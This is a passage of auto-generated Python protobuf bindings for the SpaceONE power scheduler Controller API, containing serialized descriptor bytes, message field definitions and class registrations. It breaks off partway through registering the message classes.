\x01(\t2\xc9\x0b\n\nController\x12\x9c\x01\n\x06\x63reate\x12\x38.spaceone.api.power_scheduler.v1.CreateControllerRequest\x1a/.spaceone.api.power_scheduler.v1.ControllerInfo\"\'\x82\xd3\xe4\x93\x02!\"\x1f/power-scheduler/v1/controllers\x12\xab\x01\n\x06update\x12\x38.spaceone.api.power_scheduler.v1.UpdateControllerRequest\x1a/.spaceone.api.power_scheduler.v1.ControllerInfo\"6\x82\xd3\xe4\x93\x02\x30\x1a./power-scheduler/v1/controller/{controller_id}\x12\x8c\x01\n\x06\x64\x65lete\x12\x32.spaceone.api.power_scheduler.v1.ControllerRequest\x1a\x16.google.protobuf.Empty\"6\x82\xd3\xe4\x93\x02\x30*./power-scheduler/v1/controller/{controller_id}\x12\xa5\x01\n\x03get\x12\x35.spaceone.api.power_scheduler.v1.GetControllerRequest\x1a/.spaceone.api.power_scheduler.v1.ControllerInfo\"6\x82\xd3\xe4\x93\x02\x30\x12./power-scheduler/v1/controller/{controller_id}\x12\xbd\x01\n\x04list\x12\x30.spaceone.api.power_scheduler.v1.ControllerQuery\x1a\x30.spaceone.api.power_scheduler.v1.ControllersInfo\"Q\x82\xd3\xe4\x93\x02K\x12\x1f/power-scheduler/v1/controllersZ(\"&/power-scheduler/v1/controllers/search\x12\x83\x01\n\x04stat\x12\x34.spaceone.api.power_scheduler.v1.ControllerStatQuery\x1a\x17.google.protobuf.Struct\",\x82\xd3\xe4\x93\x02&\"$/power-scheduler/v1/controllers/stat\x12\x92\x01\n\x07\x63ontrol\x12/.spaceone.api.power_scheduler.v1.ControlRequest\x1a\x16.google.protobuf.Empty\">\x82\xd3\xe4\x93\x02\x38\"6/power-scheduler/v1/controller/{controller_id}/control\x12\xb5\x01\n\rupdate_plugin\x12\x34.spaceone.api.power_scheduler.v1.UpdatePluginRequest\x1a/.spaceone.api.power_scheduler.v1.ControllerInfo\"=\x82\xd3\xe4\x93\x02\x37\x1a\x35/power-scheduler/v1/controller/{controller_id}/plugin\x12\xa3\x01\n\rverify_plugin\x12\x34.spaceone.api.power_scheduler.v1.VerifyPluginRequest\x1a\x16.google.protobuf.Empty\"D\x82\xd3\xe4\x93\x02>\"</power-scheduler/v1/controller/{controller_id}/plugin/verifyb\x06proto3'
,
dependencies=[google_dot_protobuf_dot_empty__pb2.DESCRIPTOR,google_dot_protobuf_dot_struct__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,spaceone_dot_api_dot_core_dot_v1_dot_query__pb2.DESCRIPTOR,])
_PLUGININFO = _descriptor.Descriptor(
name='PluginInfo',
full_name='spaceone.api.power_scheduler.v1.PluginInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='plugin_id', full_name='spaceone.api.power_scheduler.v1.PluginInfo.plugin_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='version', full_name='spaceone.api.power_scheduler.v1.PluginInfo.version', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='options', full_name='spaceone.api.power_scheduler.v1.PluginInfo.options', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='provider', full_name='spaceone.api.power_scheduler.v1.PluginInfo.provider', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='metadata', full_name='spaceone.api.power_scheduler.v1.PluginInfo.metadata', index=4,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=209,
serialized_end=360,
)
_CREATECONTROLLERREQUEST = _descriptor.Descriptor(
name='CreateControllerRequest',
full_name='spaceone.api.power_scheduler.v1.CreateControllerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='spaceone.api.power_scheduler.v1.CreateControllerRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='plugin_info', full_name='spaceone.api.power_scheduler.v1.CreateControllerRequest.plugin_info', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='tags', full_name='spaceone.api.power_scheduler.v1.CreateControllerRequest.tags', index=2,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.power_scheduler.v1.CreateControllerRequest.domain_id', index=3,
number=22, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=363,
serialized_end=526,
)
_UPDATECONTROLLERREQUEST = _descriptor.Descriptor(
name='UpdateControllerRequest',
full_name='spaceone.api.power_scheduler.v1.UpdateControllerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='controller_id', full_name='spaceone.api.power_scheduler.v1.UpdateControllerRequest.controller_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='spaceone.api.power_scheduler.v1.UpdateControllerRequest.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='plugin_info', full_name='spaceone.api.power_scheduler.v1.UpdateControllerRequest.plugin_info', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='tags', full_name='spaceone.api.power_scheduler.v1.UpdateControllerRequest.tags', index=3,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.power_scheduler.v1.UpdateControllerRequest.domain_id', index=4,
number=22, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=529,
serialized_end=715,
)
_CONTROLLERREQUEST = _descriptor.Descriptor(
name='ControllerRequest',
full_name='spaceone.api.power_scheduler.v1.ControllerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='controller_id', full_name='spaceone.api.power_scheduler.v1.ControllerRequest.controller_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.power_scheduler.v1.ControllerRequest.domain_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=717,
serialized_end=778,
)
_GETCONTROLLERREQUEST = _descriptor.Descriptor(
name='GetControllerRequest',
full_name='spaceone.api.power_scheduler.v1.GetControllerRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='controller_id', full_name='spaceone.api.power_scheduler.v1.GetControllerRequest.controller_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.power_scheduler.v1.GetControllerRequest.domain_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='only', full_name='spaceone.api.power_scheduler.v1.GetControllerRequest.only', index=2,
number=3, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=780,
serialized_end=858,
)
_CONTROLLERQUERY = _descriptor.Descriptor(
name='ControllerQuery',
full_name='spaceone.api.power_scheduler.v1.ControllerQuery',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='query', full_name='spaceone.api.power_scheduler.v1.ControllerQuery.query', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='controller_id', full_name='spaceone.api.power_scheduler.v1.ControllerQuery.controller_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='spaceone.api.power_scheduler.v1.ControllerQuery.name', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.power_scheduler.v1.ControllerQuery.domain_id', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=860,
serialized_end=977,
)
_CONTROLLERINFO = _descriptor.Descriptor(
name='ControllerInfo',
full_name='spaceone.api.power_scheduler.v1.ControllerInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='controller_id', full_name='spaceone.api.power_scheduler.v1.ControllerInfo.controller_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='spaceone.api.power_scheduler.v1.ControllerInfo.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='provider', full_name='spaceone.api.power_scheduler.v1.ControllerInfo.provider', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='capability', full_name='spaceone.api.power_scheduler.v1.ControllerInfo.capability', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='plugin_info', full_name='spaceone.api.power_scheduler.v1.ControllerInfo.plugin_info', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='tags', full_name='spaceone.api.power_scheduler.v1.ControllerInfo.tags', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='created_at', full_name='spaceone.api.power_scheduler.v1.ControllerInfo.created_at', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.power_scheduler.v1.ControllerInfo.domain_id', index=7,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=980,
serialized_end=1240,
)
_CONTROLLERSINFO = _descriptor.Descriptor(
name='ControllersInfo',
full_name='spaceone.api.power_scheduler.v1.ControllersInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='results', full_name='spaceone.api.power_scheduler.v1.ControllersInfo.results', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='total_count', full_name='spaceone.api.power_scheduler.v1.ControllersInfo.total_count', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1242,
serialized_end=1346,
)
_CONTROLLERSTATQUERY = _descriptor.Descriptor(
name='ControllerStatQuery',
full_name='spaceone.api.power_scheduler.v1.ControllerStatQuery',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='query', full_name='spaceone.api.power_scheduler.v1.ControllerStatQuery.query', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.power_scheduler.v1.ControllerStatQuery.domain_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1348,
serialized_end=1442,
)
_CONTROLREQUEST = _descriptor.Descriptor(
name='ControlRequest',
full_name='spaceone.api.power_scheduler.v1.ControlRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='controller_id', full_name='spaceone.api.power_scheduler.v1.ControlRequest.controller_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='filter', full_name='spaceone.api.power_scheduler.v1.ControlRequest.filter', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='secret_id', full_name='spaceone.api.power_scheduler.v1.ControlRequest.secret_id', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.power_scheduler.v1.ControlRequest.domain_id', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='use_cache', full_name='spaceone.api.power_scheduler.v1.ControlRequest.use_cache', index=4,
number=5, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1445,
serialized_end=1582,
)
_UPDATEPLUGINREQUEST = _descriptor.Descriptor(
name='UpdatePluginRequest',
full_name='spaceone.api.power_scheduler.v1.UpdatePluginRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='controller_id', full_name='spaceone.api.power_scheduler.v1.UpdatePluginRequest.controller_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='version', full_name='spaceone.api.power_scheduler.v1.UpdatePluginRequest.version', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='options', full_name='spaceone.api.power_scheduler.v1.UpdatePluginRequest.options', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.power_scheduler.v1.UpdatePluginRequest.domain_id', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1584,
serialized_end=1706,
)
_VERIFYPLUGINREQUEST = _descriptor.Descriptor(
name='VerifyPluginRequest',
full_name='spaceone.api.power_scheduler.v1.VerifyPluginRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='controller_id', full_name='spaceone.api.power_scheduler.v1.VerifyPluginRequest.controller_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='secret_id', full_name='spaceone.api.power_scheduler.v1.VerifyPluginRequest.secret_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.power_scheduler.v1.VerifyPluginRequest.domain_id', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1708,
serialized_end=1790,
)
_PLUGININFO.fields_by_name['options'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_PLUGININFO.fields_by_name['metadata'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_CREATECONTROLLERREQUEST.fields_by_name['plugin_info'].message_type = _PLUGININFO
_CREATECONTROLLERREQUEST.fields_by_name['tags'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_UPDATECONTROLLERREQUEST.fields_by_name['plugin_info'].message_type = _PLUGININFO
_UPDATECONTROLLERREQUEST.fields_by_name['tags'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_CONTROLLERQUERY.fields_by_name['query'].message_type = spaceone_dot_api_dot_core_dot_v1_dot_query__pb2._QUERY
_CONTROLLERINFO.fields_by_name['capability'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_CONTROLLERINFO.fields_by_name['plugin_info'].message_type = _PLUGININFO
_CONTROLLERINFO.fields_by_name['tags'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_CONTROLLERSINFO.fields_by_name['results'].message_type = _CONTROLLERINFO
_CONTROLLERSTATQUERY.fields_by_name['query'].message_type = spaceone_dot_api_dot_core_dot_v1_dot_query__pb2._STATISTICSQUERY
_CONTROLREQUEST.fields_by_name['filter'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_UPDATEPLUGINREQUEST.fields_by_name['options'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
DESCRIPTOR.message_types_by_name['PluginInfo'] = _PLUGININFO
DESCRIPTOR.message_types_by_name['CreateControllerRequest'] = _CREATECONTROLLERREQUEST
DESCRIPTOR.message_types_by_name['UpdateControllerRequest'] = _UPDATECONTROLLERREQUEST
DESCRIPTOR.message_types_by_name['ControllerRequest'] = _CONTROLLERREQUEST
DESCRIPTOR.message_types_by_name['GetControllerRequest'] = _GETCONTROLLERREQUEST
DESCRIPTOR.message_types_by_name['ControllerQuery'] = _CONTROLLERQUERY
DESCRIPTOR.message_types_by_name['ControllerInfo'] = _CONTROLLERINFO
DESCRIPTOR.message_types_by_name['ControllersInfo'] = _CONTROLLERSINFO
DESCRIPTOR.message_types_by_name['ControllerStatQuery'] = _CONTROLLERSTATQUERY
DESCRIPTOR.message_types_by_name['ControlRequest'] = _CONTROLREQUEST
DESCRIPTOR.message_types_by_name['UpdatePluginRequest'] = _UPDATEPLUGINREQUEST
DESCRIPTOR.message_types_by_name['VerifyPluginRequest'] = _VERIFYPLUGINREQUEST
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
PluginInfo = _reflection.GeneratedProtocolMessageType('PluginInfo', (_message.Message,), {
'DESCRIPTOR' : _PLUGININFO,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.PluginInfo)
})
_sym_db.RegisterMessage(PluginInfo)
CreateControllerRequest = _reflection.GeneratedProtocolMessageType('CreateControllerRequest', (_message.Message,), {
'DESCRIPTOR' : _CREATECONTROLLERREQUEST,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.CreateControllerRequest)
})
_sym_db.RegisterMessage(CreateControllerRequest)
UpdateControllerRequest = _reflection.GeneratedProtocolMessageType('UpdateControllerRequest', (_message.Message,), {
'DESCRIPTOR' : _UPDATECONTROLLERREQUEST,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.UpdateControllerRequest)
})
_sym_db.RegisterMessage(UpdateControllerRequest)
ControllerRequest = _reflection.GeneratedProtocolMessageType('ControllerRequest', (_message.Message,), {
'DESCRIPTOR' : _CONTROLLERREQUEST,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.ControllerRequest)
})
_sym_db.RegisterMessage(ControllerRequest)
GetControllerRequest = _reflection.GeneratedProtocolMessageType('GetControllerRequest', (_message.Message,), {
'DESCRIPTOR' : _GETCONTROLLERREQUEST,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.GetControllerRequest)
})
_sym_db.RegisterMessage(GetControllerRequest)
ControllerQuery = _reflection.GeneratedProtocolMessageType('ControllerQuery', (_message.Message,), {
'DESCRIPTOR' : _CONTROLLERQUERY,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.ControllerQuery)
})
_sym_db.RegisterMessage(ControllerQuery)
ControllerInfo = _reflection.GeneratedProtocolMessageType('ControllerInfo', (_message.Message,), {
'DESCRIPTOR' : _CONTROLLERINFO,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.ControllerInfo)
})
_sym_db.RegisterMessage(ControllerInfo)
ControllersInfo = _reflection.GeneratedProtocolMessageType('ControllersInfo', (_message.Message,), {
'DESCRIPTOR' : _CONTROLLERSINFO,
'__module__' : 'spaceone.api.power_scheduler.v1.controller_pb2'
# @@protoc_insertion_point(class_scope:spaceone.api.power_scheduler.v1.ControllersInfo)
})
_sym_db.RegisterMessage(ControllersInfo)
ControllerStatQuery = _reflection.GeneratedProtocolMessageType('ControllerStatQuery', (_message.Message,), {
